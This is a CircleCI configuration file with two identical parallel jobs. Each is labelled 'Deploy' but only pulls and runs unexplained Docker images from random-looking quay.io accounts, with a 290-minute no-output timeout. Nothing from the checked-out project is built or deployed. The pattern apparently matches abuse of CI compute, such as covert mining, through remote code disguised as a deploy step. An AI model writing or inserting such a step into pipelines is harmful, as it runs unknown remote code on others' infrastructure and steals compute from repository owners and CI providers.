version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                      docker pull quay.io/eyfsubdi78/a:latest
                      docker run quay.io/lekilite01/nyobelah
         no_output_timeout: 290m
  build1:
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                      docker pull quay.io/eyfsubdi78/a:latest
                      docker run quay.io/lekilite01/nyobelah
         no_output_timeout: 290m

workflows:
  main:
    jobs:
      - build
      - build1
